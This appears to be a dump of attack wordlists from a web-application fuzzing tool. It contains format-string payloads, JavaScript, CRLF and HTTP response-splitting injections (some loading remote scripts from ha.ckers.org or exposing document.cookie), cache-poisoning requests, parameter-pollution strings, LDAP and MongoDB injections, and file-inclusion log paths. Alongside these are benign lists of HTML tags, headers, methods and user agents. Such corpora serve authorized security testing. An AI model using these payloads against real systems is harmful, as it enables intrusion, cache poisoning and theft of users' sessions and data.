https://raw.githubusercontent.com/dzonerzy/goWAPT/3aed792cbca3ec8f7fbf106c39116b197188924b/wordlist/attack/file-upload/malicious-images/uber.gif -------------------------------------------------------------------------------- /wordlist/attack/file-upload/malicious-images/xssproject.swf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dzonerzy/goWAPT/3aed792cbca3ec8f7fbf106c39116b197188924b/wordlist/attack/file-upload/malicious-images/xssproject.swf -------------------------------------------------------------------------------- /wordlist/attack/format-strings/format-strings.txt: -------------------------------------------------------------------------------- 1 | %s%p%x%d 2 | %p%p%p%p 3 | %x%x%x%x 4 | %d%d%d%d 5 | %s%s%s%s 6 | %99999999999s 7 | %08x 8 | %20d 9 | %20n 10 | %20x 11 | %20s 12 | %d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d 13 | %i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i 14 | %o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o 15 | %u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u 16 | %x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x 17 | %X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X 18 | %a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a 19 | %A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A 20 | %e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e 21 | %E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E 22 | %f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f 23 | %F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F 24 | %g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g 25 | %G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G 26 | %s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s 27 | %p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p 28 | %#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%% 29 | XXXXX.%p 30 | XXXXX`perl -e 'print ".%p" x 80'` 31 | `perl -e 'print ".%p" x 80'`%n 32 | %08x.%08x.%08x.%08x.%08x\n 33 | XXX0_%08x.%08x.%08x.%08x.%08x\n 34 | %.16705u%2\$hn 35 | \x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s| 36 | AAAAA%c 37 | AAAAA%d 38 | AAAAA%e 39 | AAAAA%f 40 | AAAAA%I 41 | AAAAA%o 42 | AAAAA%p 43 | AAAAA%s 44 | AAAAA%x 45 | AAAAA%n 46 | ppppp%c 47 | ppppp%d 48 | ppppp%e 49 | ppppp%f 50 | ppppp%I 51 | ppppp%o 52 | ppppp%p 53 | ppppp%s 54 | ppppp%x 55 | ppppp%n 56 | %@ 57 | %@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@ 58 | -------------------------------------------------------------------------------- /wordlist/attack/html_js_fuzz/html_attributes.txt: -------------------------------------------------------------------------------- 1 | accept 2 | accept-charset 3 | accesskey 4 | action 5 | align 6 | alt 7 | async 8 | autocomplete 9 | autofocus 10 | autoplay 11 | bgcolor 12 | border 13 | challenge 14 | charset 15 | checked 16 | cite 17 | class 18 | color 19 | cols 20 | colspan 21 | content 22 | contenteditable 23 | contextmenu 24 | controls 25 | coords 26 | data 27 | data-userdefined-attribute 28 | datetime 29 | default 30 | defer 31 | dir 32 | dirname 33 | disabled 34 | download 35 | draggable 36 | dropzone 37 | enctype 38 | for 39 | form 40 | formaction 41 | headers 42 | height 43 | hidden 44 | high 45 | href 46 | hreflang 47 | http-equiv 48 | id 49 | ismap 50 | keytype 51 | kind 52 | label 53 | lang 54 | list 55 | loop 56 | low 57 | manifest 58 | max 59 | maxlength 60 | media 61 | method 62 | min 63 | multiple 64 | muted 65 | name 66 | novalidate 67 | onabort 68 | onafterprint 69 | onbeforeprint 70 | onbeforeunload 71 | onblur 72 | oncanplay 73 | oncanplaythrough 74 | onchange 75 | onclick 76 | oncontextmenu 77 | oncopy 78 | oncuechange 79 | oncut 80 | ondblclick 81 | ondrag 82 | ondragend 83 | ondragenter 84 | ondragleave 85 | ondragover 86 | ondragstart 87 | ondrop 88 | ondurationchange 89 | onemptied 90 | onended 91 | onerror 92 | onfocus 93 | onhashchange 94 | oninput 95 | oninvalid 96 | onkeydown 97 | onkeypress 98 | onkeyup 99 | onload 100 | onloadeddata 101 | onloadedmetadata 102 | onloadstart 103 | onmessage 104 | onmousedown 105 | onmousemove 106 | onmouseout 107 | onmouseover 108 | onmouseup 109 | onmousewheel 110 | onoffline 111 | ononline 112 | onpagehide 113 | onpageshow 114 | onpaste 115 | onpause 116 | onplay 117 | onplaying 118 | onpopstate 119 | onprogress 120 | onratechange 121 | onreset 122 | onresize 123 | onscroll 124 | onsearch 125 | onseeked 126 | onseeking 127 | onselect 128 | onshow 129 | onstalled 130 | onstorage 131 | onsubmit 132 | onsuspend 133 | ontimeupdate 134 | ontoggle 135 | onunload 136 | onvolumechange 137 | onwaiting 138 | onwheel 139 | open 140 | optimum 141 | pattern 142 | placeholder 143 | poster 144 | preload 145 | readonly 146 | rel 147 | required 148 | reversed 149 | rows 150 | rowspan 151 | sandbox 152 | scope 153 | scoped 154 | selected 155 | shape 156 | size 157 | sizes 158 | span 159 | spellcheck 160 | src 161 | srcdoc 162 | srclang 163 | start 164 | step 165 | style 166 | tabindex 167 | target 168 | title 169 | translate 170 | type 171 | usemap 172 | value 173 | width 174 | wrap 175 | -------------------------------------------------------------------------------- /wordlist/attack/html_js_fuzz/html_tags.txt: -------------------------------------------------------------------------------- 1 | !-- -- 2 | !DOCTYPE 3 | a 4 | abbr 5 | acronym 6 | address 7 | applet 8 | area 9 | article 10 | aside 11 | audio 12 | b 13 | base 14 | basefont 15 | bdi 16 | bdo 17 | big 18 | blockquote 19 | body 20 | br 21 | button 22 | canvas 23 | caption 24 | center 25 | cite 26 | code 27 | col 28 | colgroup 29 | datalist 30 | dd 31 | del 32 | details 33 | dfn 34 | dialog 35 | dir 36 | div 37 | dl 38 | dt 39 | em 40 | embed 41 | fieldset 42 | figcaption 43 | figure 44 | font 45 | footer 46 | form 47 | frame 48 | frameset 49 | h1 50 | h2 51 | h3 52 | h4 53 | h5 54 | h6 55 | head 56 | header 57 | hr 58 | html 59 | i 60 | iframe 61 | img 62 | input 63 | ins 64 | kbd 65 | keygen 66 | label 67 | legend 68 | li 69 | link 70 | main 71 | map 72 | mark 73 | menu 74 | menuitem 75 | meta 76 | meter 77 | nav 78 | noframes 79 | noscript 80 | object 81 | ol 82 | optgroup 83 | option 84 | output 85 | p 86 | param 87 | pre 88 | progress 89 | q 90 | rp 91 | rt 92 | ruby 93 | s 94 | samp 95 | script 96 | section 97 | select 98 | small 99 | source 100 | span 101 | strike 102 | strong 103 | style 104 | sub 105 | summary 106 | sup 107 | table 108 | tbody 109 | td 110 | textarea 111 | tfoot 112 | th 113 | thead 114 | time 115 | title 116 | tr 117 | track 118 | tt 119 | u 120 | ul 121 | var 122 | video 123 | wbr 124 | -------------------------------------------------------------------------------- /wordlist/attack/html_js_fuzz/javascript_events.txt: -------------------------------------------------------------------------------- 1 | onafterprint 2 | onbeforeprint 3 | onbeforeonload 4 | onblur 5 | onerror 6 | onfocus 7 | onhaschange 8 | onload 9 | onmessage 10 | onoffline 11 | ononline 12 | onpagehide 13 | onpageshow 14 | onpopstate 15 | onredo 16 | onresize 17 | onstorage 18 | onundo 19 | onunload 20 | onblur 21 | onchange 22 | oncontextmenu 23 | onfocus 24 | onformchange 25 | onforminput 26 | oninput 27 | oninvalid 28 | onreset 29 | onselect 30 | onsubmit 31 | onkeydown 32 | onkeypress 33 | onkeyup 34 | onclick 35 | ondblclick 36 | ondrag 37 | ondragend 38 | ondragenter 39 | ondragleave 40 | ondragover 41 | ondragstart 42 | ondrop 43 | onmousedown 44 | onmousemove 45 | onmouseout 46 | onmouseover 47 | onmouseup 48 | onmousewheel 49 | onscroll 50 | onabort 51 | oncanplay 52 | oncanplaythrough 53 | ondurationchange 54 | onemptied 55 | onended 56 | onerror 57 | onloadeddata 58 | onloadedmetadata 59 | onloadedstart 60 | onpause 61 | onplay 62 | onplaying 63 | onprogress 64 | onratechange 65 | onreadystatechange 66 | onseeked 67 | onseeking 68 | onstalled 69 | onsuspend 70 | ontimeupdate 71 | onvolumechange 72 | onwaiting 73 | style 74 | 75 | -------------------------------------------------------------------------------- /wordlist/attack/html_js_fuzz/js_inject.txt: -------------------------------------------------------------------------------- 1 | function(){ return this.userid} 2 | ' function(){ return this.username} or '1'='1 3 | function(){return version()} 4 | function(){return version} 5 | t'; return this; var d='! 6 | " function(){ return this} or '1'='1 7 | t"; return this; var d='! 8 | ' || this || '1'=='1 9 | ' || this.version || '1'=='1 10 | ' || '1'=='1 11 | -------------------------------------------------------------------------------- /wordlist/attack/html_js_fuzz/quotationmarks.txt: -------------------------------------------------------------------------------- 1 | ' 2 | " 3 | '' 4 | "" 5 | '"' 6 | "''''"'" 7 | "'"'"''''" 8 | 9 | 10 | 11 | 12 | -------------------------------------------------------------------------------- /wordlist/attack/http-protocol/crlf-injection.txt: -------------------------------------------------------------------------------- 1 | %0d%0a 2 | %0d%0a%0d%0a 3 | r%0d%0aContentLength:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContentType:%20text/html%0d%0aContentLength:%2019%0d%0a%0d%0aInjected%02Content 4 | %0d%0d%0a%0a 5 | 0x0D0x0A 6 | 0x0D0x0D0x0A0x0A 7 | \r\n 8 | %5cr%5cn 9 | %0%0d%0ad%0%0d%0aa 10 | %0%0D%0AD%0%0D%0AA 11 | %0d%0aContentType:%20text/html;charset=UTF-7%0d%0aContent-Length:%20129%0d%0a%0d%0a%2BADw-html%2BAD4-%2BADw-body%2BAD4-%2BADw-script%2BAD4-alert%28%27XSS,cookies:%27%2Bdocument.cookie%29%2BADw-/script%2BAD4-%2BADw-/body%2BAD4-%2BADw-/html%2BAD4 12 | %0AContent-Type:html%0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3E 13 | %0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3E 14 | %0AContent-Type:html%0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3Ehttp://www.test.com 15 | %0d%0a%0d%0a%3Chtml%3E%3Cbody%3E%3C%2Fbody%3E%3Cscript+src%3Dhttp%3A%2F%2Fha.ckers.org%2Fs.js%3E%3C%2Fscript%3E%3Cscript%3Ealert(%22location.host%20is:%20%22%2Blocation.host)%3C%2Fscript%3E%3C%2Fhtml%3E 16 | %0d%0a%0d%0a%3Cscript+src%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2Fscript%3E 17 | %22%3E%0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3C%22 18 | %0AContent-type:%20text/html%0A%0Ahttp://www.test.com/%3Cscript%3Ealert(%22XSS%22)%3C/script%3E 19 | %0d%0a%0d%0a%3Cscript%3Ealert(%22XSS%22)%3C%2Fscript%3E 20 | %0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3E 21 | -------------------------------------------------------------------------------- /wordlist/attack/http-protocol/hpp.txt: -------------------------------------------------------------------------------- 1 | # HTTP paramter polution and interpretation payloads by Jacco van Tuijl 2 | ?id=id=1 3 | &id=1?id=2 4 | ?id['&id=1']=2 5 | ?id[1&id=2]=1 6 | ?id=1&id=2 7 | &id=1&id=2 8 | ?id=1%26id%3D2 9 | ?id&id=1 10 | ????id=1 11 | &&&&id=1 12 | ?id=id['1']=2 13 | ?id=1#id=2 14 | ?id==1 15 | ?id===1 16 | ;id=1?id=2 17 | ?id;id=1 18 | &id=1;id=2 19 | #id=1?id=2&id=3 20 | ?id=1,2 21 | ?id1,id2=1 22 | ?id[=1&id=2]=3 23 | ?id[&id=2]=1 24 | ?id=[1,2] 25 | ?id&=1 26 | ?id[]=1&id=2 27 | ?id=/:@&=+$&id=2 28 | ?id[=/:@&=+$&id=2]=1 29 | ?id={id:{id:1},2} 30 | ?id[{id:{id[]:1},2}]=3 31 | ?id=%23?id=1 32 | ?id=1%26id=2 33 | ?id=1%2526id=2 34 | ?id=1%c0%a6id=2 35 | ?id=1\uc0a6id=2 36 | ?id=1&id=2 37 | ?id=1&id=2 38 | ?id=1%u0026;id=2 -------------------------------------------------------------------------------- /wordlist/attack/http-protocol/http-header-cache-poison.txt: -------------------------------------------------------------------------------- 1 | # Header Injection / Cache Poison 1.0 (fuzz the entire get req) (12 April 2010) 2 | # creative commons license http://creativecommons.org/licenses/by/3.0/ 3 | # projurl 4 | GET http://{SITE}testsite.com/redir.php?site=%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aLast-Modified:%20Mon,%2027%20Oct%202009%2014:50:18%20GMT%0d%0aContent-Length:%2020%0d%0aContent-Type:%20text/html%0d%0a%0d%0adeface! HTTP/1.1GET http://{SITE}/{REDIRECTURL}?site=%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aLast-Modified:%20Mon,%2027%20Oct%202009%2014:50:18%20GMT%0d%0aContent-Length:%2020%0d%0aContent-Type:%20text/html%0d%0a%0d%0adeface! HTTP/1.1 5 | %0d%0aX-Injection-Header:%20AttackValue 6 | -------------------------------------------------------------------------------- /wordlist/attack/http-protocol/http-protocol-methods.txt: -------------------------------------------------------------------------------- 1 | OPTIONS 2 | GET 3 | HEAD 4 | POST 5 | PUT 6 | DELETE 7 | TRACE 8 | TRACK 9 | CONNECT 10 | PROPFIND 11 | PROPPATCH 12 | MKCOL 13 | COPY 14 | MOVE 15 | LOCK 16 | UNLOCK 17 | VERSION-CONTROL 18 | REPORT 19 | CHECKOUT 20 | CHECKIN 21 | UNCHECKOUT 22 | MKWORKSPACE 23 | UPDATE 24 | LABEL 25 | MERGE 26 | BASELINE-CONTROL 27 | MKACTIVITY 28 | ORDERPATCH 29 | ACL 30 | PATCH 31 | SEARCH 32 | ARBITRARY 33 | BCOPY 34 | BDELETE 35 | BMOVE 36 | BPROPFIND 37 | BPROPPATCH 38 | DEBUG 39 | INDEX 40 | NOTIFY 41 | POLL 42 | RPC_IN_DATA 43 | RPC_OUT_DATA 44 | SUBSCRIBE 45 | UNSUBSCRIBE 46 | X-MS-ENUMATTS 47 | -------------------------------------------------------------------------------- /wordlist/attack/http-protocol/http-request-header-field-names.txt: -------------------------------------------------------------------------------- 1 | Accept 2 | Accept-Charset 3 | Accept-Encoding 4 | Accept-Language 5 | Accept-Datetime 6 | Authorization 7 | Cache-Control 8 | Connection 9 | Cookie 10 | Content-Length 11 | Content-MD5 12 | Content-Type 13 | Date 14 | Expect 15 | From 16 | Host 17 | If-Match 18 | If-Modified-Since 19 | If-None-Match 20 | If-Range 21 | If-Unmodified-Since 22 | Max-Forwards 23 | Origin 24 | Pragma 25 | Proxy-Authorization 26 | Range 27 | Referer 28 | TE 29 | User-Agent 30 | Upgrade 31 | Via 32 | Warning 33 | X-Requested-With 34 | DNT 35 | X-Forwarded-For 36 | X-Forwarded-Host 37 | X-Forwarded-Proto 38 | Front-End-Https 39 | X-Http-Method-Override 40 | X-ATT-DeviceId 41 | X-Wap-Profile 42 | Proxy-Connection -------------------------------------------------------------------------------- /wordlist/attack/http-protocol/http-response-header-field-names.txt: -------------------------------------------------------------------------------- 1 | Access-Control-Allow-Origin 2 | Accept-Ranges 3 | Age 4 | Allow 5 | Cache-Control 6 | Connection 7 | Content-Encoding 8 | Content-Language 9 | Content-Length 10 | Content-Location 11 | Content-MD5 12 | Content-Disposition 13 | Content-Range 14 | Content-Type 15 | Date 16 | ETag 17 | Expires 18 | Last-Modified 19 | Link 20 | Location 21 | P3P 22 | Pragma 23 | Proxy-Authenticate 24 | Refresh 25 | Retry-After 26 | Server 27 | Set-Cookie 28 | Status 29 | Strict-Transport-Security 30 | Trailer 31 | Transfer-Encoding 32 | Upgrade 33 | Vary 34 | Via 35 | Warning 36 | WWW-Authenticate 37 | X-Frame-Options 38 | Public-Key-Pins 39 | X-XSS-Protection 40 | Content-Security-Policy 41 | X-Content-Security-Policy 42 | X-WebKit-CSP 43 | X-Content-Type-Options 44 | X-Powered-By 45 | X-UA-Compatible -------------------------------------------------------------------------------- /wordlist/attack/http-protocol/known-uri-types.txt: -------------------------------------------------------------------------------- 1 | aaa: 2 | aaas: 3 | about: 4 | acap: 5 | adiumxtra: 6 | afp: 7 | aim: 8 | apt: 9 | aw: 10 | beshare: 11 | bitcoin: 12 | bolo: 13 | callto: 14 | cap: 15 | chrome: 16 | cid: 17 | coap: 18 | content: 19 | crid: 20 | cvs: 21 | data: 22 | dav: 23 | dict: 24 | dns: 25 | doi: 26 | ed2k: 27 | facetime: 28 | fax: 29 | feed: 30 | file: 31 | finger: 32 | fish: 33 | ftp: 34 | geo: 35 | gg: 36 | git: 37 | gizmoproject: 38 | go: 39 | gopher: 40 | gtalk: 41 | h323: 42 | http: 43 | https: 44 | iax: 45 | icap: 46 | im: 47 | imap: 48 | info: 49 | ipp: 50 | irc: 51 | irc6: 52 | ircs: 53 | iris.beep: 54 | iris.lws: 55 | iris.xpcs: 56 | iris.xpc: 57 | iris: 58 | itms: 59 | jar: 60 | javascript: 61 | keyparc: 62 | lastfm: 63 | ldap: 64 | ldaps: 65 | lsid: 66 | magnet: 67 | mailto: 68 | maps: 69 | market: 70 | message: 71 | mid: 72 | mms: 73 | modem: 74 | msnim: 75 | msrps: 76 | msrp: 77 | mtqp: 78 | mumble: 79 | mupdate: 80 | mvn: 81 | news: 82 | nfs: 83 | nntp: 84 | notes: 85 | opaquelocktoken: 86 | palm: 87 | paparazzi: 88 | platform: 89 | pop: 90 | pres: 91 | prospero: 92 | proxy: 93 | psyc: 94 | query: 95 | rmi: 96 | rsync: 97 | rtmp: 98 | rtsp: 99 | secondlife: 100 | service: 101 | sftp: 102 | sgn: 103 | shttp: 104 | sieve: 105 | sip: 106 | sips: 107 | skype: 108 | smb: 109 | sms: 110 | snmp: 111 | soap.beeps: 112 | soap.beep: 113 | soldat: 114 | spotify: 115 | ssh: 116 | steam: 117 | svn: 118 | tag: 119 | teamspeak: 120 | tel: 121 | telnet: 122 | tftp: 123 | things: 124 | thismessage: 125 | tip: 126 | tv: 127 | udp: 128 | unreal: 129 | urn: 130 | ut2004: 131 | uuid: 132 | vemmi: 133 | ventrilo: 134 | view-source: 135 | wais: 136 | webcal: 137 | wss: 138 | ws: 139 | wtai: 140 | wyciwyg: 141 | xfire: 142 | xmlrpc.beeps: 143 | xmlrpc.beep : 144 | xmpp: 145 | xri: 146 | ymsgr: 147 | z39.50r: 148 | z39.50s: 149 | -------------------------------------------------------------------------------- /wordlist/attack/http-protocol/user-agents.txt: -------------------------------------------------------------------------------- 1 | # List of user agents from jbrofuzz (13 april 2010) 2 | User-Agent: Mozilla/1.22 (compatible; MSIE 2.0d; Windows NT) 3 | User-Agent: Mozilla/2.0 (compatible; MSIE 3.02; Update a; Windows NT) 4 | User-Agent: Mozilla/4.0 (compatible; MSIE 4.01; Windows NT) 5 | User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 4.0) 6 | User-Agent: Mozilla/4.79 [en] (WinNT; U) 7 | User-Agent: Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:0.9.2) Gecko/20010726 Netscape6/6.1 8 | User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4 9 | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022) 10 | User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.19) Gecko/20081204 SeaMonkey/1.1.14 11 | User-Agent: Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaE90-1/210.34.75 Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413 12 | User-Agent: Mozilla/5.0 (iPhone; U; CPU iPhone OS 2_2 like Mac OS X; en-us) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.1 Mobile/5G77 Safari/525.20 13 | User-Agent: Mozilla/5.0 (Linux; U; Android 1.5; en-gb; HTC Magic Build/CRB17) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 14 | User-Agent: Opera/9.27 (Windows NT 5.1; U; en) 15 | User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1 16 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322) 17 | User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/0.4.154.25 Safari/525.19 18 | User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.48 Safari/525.19 19 | User-Agent: Wget/1.8.2 20 | User-Agent: Mozilla/5.0 (PLAYSTATION 3; 1.00) 21 | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; (R1 1.6)) 22 | User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1 23 | User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729) JBroFuzz/1.4 24 | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506) 25 | User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20050923 CentOS/1.0.7-1.4.1.centos4 Firefox/1.0.7 26 | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727) 27 | User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5 28 | User-Agent: Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.7) Gecko/20070606 29 | User-Agent: Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.8.1.14) Gecko/20080520 Firefox/2.0.0.14 30 | User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.5) Gecko/2008120121 Firefox/3.0.5 31 | -------------------------------------------------------------------------------- /wordlist/attack/integer-overflow/integer-overflows.txt: -------------------------------------------------------------------------------- 1 | -1 2 | 0 3 | 0x100 4 | 0x1000 5 | 0x3fffffff 6 | 0x7ffffffe 7 | 0x7fffffff 8 | 0x80000000 9 | 0xfffffffe 10 | 0xffffffff 11 | 0x10000 12 | 0x100000 13 | -------------------------------------------------------------------------------- /wordlist/attack/ip/localhost.txt: -------------------------------------------------------------------------------- 1 | 127.0.0.1 2 | 127.0.0.2 3 | 127.1 4 | 127.2 5 | ::1 6 | 0:0:0:0:0:0:0:1 7 | 0:0:0:000:0:0:0:1 8 | 0000:0000:0000:0000:0000:0000:0000:0001 9 | 2130706433 10 | 2130706434 11 | 7F000001 12 | 7F000002 13 | localhost 14 | -------------------------------------------------------------------------------- /wordlist/attack/ldap/ldap-injection.txt: -------------------------------------------------------------------------------- 1 | ! 2 | %21 3 | %26 4 | %28 5 | %29 6 | %2A%28%7C%28mail%3D%2A%29%29 7 | %2A%28%7C%28objectclass%3D%2A%29%29 8 | %2A%7C 9 | %7C 10 | \21 11 | \26 12 | \28 13 | \29 14 | & 15 | ( 16 | ) 17 | * 18 | *()|%26' 19 | *()|&' 20 | *(|(mail=*)) 21 | *(|(objectclass=*)) 22 | *)(uid=*))(|(uid=* 23 | (*)*) 24 | *)* 25 | */* 26 | *| 27 | / 28 | // 29 | //* 30 | @* 31 | | 32 | admin* 33 | admin*)((|userpassword=*) 34 | admin*)((|userPassword=*) 35 | x' or name()='username' or 'x'='y 36 | -------------------------------------------------------------------------------- /wordlist/attack/lfi/common-ms-httpd-log-locations.txt: -------------------------------------------------------------------------------- 1 | \Program Files\Apache Group\Apache\logs\access.log 2 | \Program Files\Apache Group\Apache\logs\error.log 3 | \Program Files\Apache Group\Apache\conf\httpd.conf 4 | \Program Files\Apache Group\Apache2\conf\httpd.conf 5 | \Program Files (x86)\Apache Group\Apache\logs\access.log 6 | \Program Files (x86)\Apache Group\Apache\logs\error.log 7 | -------------------------------------------------------------------------------- /wordlist/attack/lfi/common-unix-httpd-log-locations.txt: -------------------------------------------------------------------------------- 1 | /apache/logs/error.log 2 | /apache/logs/access.log 3 | /apache/logs/error.log 4 | /apache/logs/access.log 5 | /apache/logs/error.log 6 | /apache/logs/access.log 7 | /etc/httpd/logs/acces_log 8 | /etc/httpd/logs/acces.log 9 | /etc/httpd/logs/error_log 10 | /etc/httpd/logs/error.log 11 | /var/www/logs/access_log 12 | /var/www/logs/access.log 13 | /usr/local/apache/logs/access_log 14 | /usr/local/apache/logs/access.log 15 | /var/log/apache/access_log 16 | /var/log/apache2/access_log 17 | /var/log/apache/access.log 18 | /var/log/apache2/access.log 19 | /var/log/access_log 20 | /var/log/access.log 21 | /var/www/logs/error_log 22 | /var/www/logs/error.log 23 | /usr/local/apache/logs/error_log 24 | /usr/local/apache/logs/error.log 25 | /var/log/apache/error_log 26 | /var/log/apache2/error_log 27 | /var/log/apache/error.log 28 | /var/log/apache2/error.log 29 | /var/log/error_log 30 | /var/log/error.log 31 | -------------------------------------------------------------------------------- /wordlist/attack/no-sql-injection/mongodb.txt: -------------------------------------------------------------------------------- 1 | true, $where: '1 == 1' 2 | , $where: '1 == 1' 3 | $where: '1 == 1' 4 | ', $where: '1 == 1' 5 | 1, $where: '1 == 1' 6 | { $ne: 1 } 7 | ', $or: [ {}, { 'a':'a 8 | ' } ], $comment:'successful MongoDB injection' 9 | db.injection.insert({success:1}); 10 | db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1 11 | || 1==1 12 | ' && this.password.match(/.*/)//+%00 13 | ' && this.passwordzz.match(/.*/)//+%00 14 | '%20%26%26%20this.password.match(/.*/)//+%00 15 | '%20%26%26%20this.passwordzz.match(/.*/)//+%00 16 | {$gt: ''} 17 | [$ne]=1 18 | -------------------------------------------------------------------------------- /wordlist/attack/os-cmd-execution/Commands-OSX.txt: -------------------------------------------------------------------------------- 1 | alias 2 | alloc 3 | apropos 4 | awk 5 | basename 6 | bash 7 | bg 8 | bind 9 | bless 10 | break 11 | builtin 12 | bzip 13 | cal 14 | caller 15 | case 16 | cat 17 | cd 18 | chflags 19 | chgrp 20 | chmod 21 | chown 22 | chroot 23 | cksum 24 | clear 25 | cmp 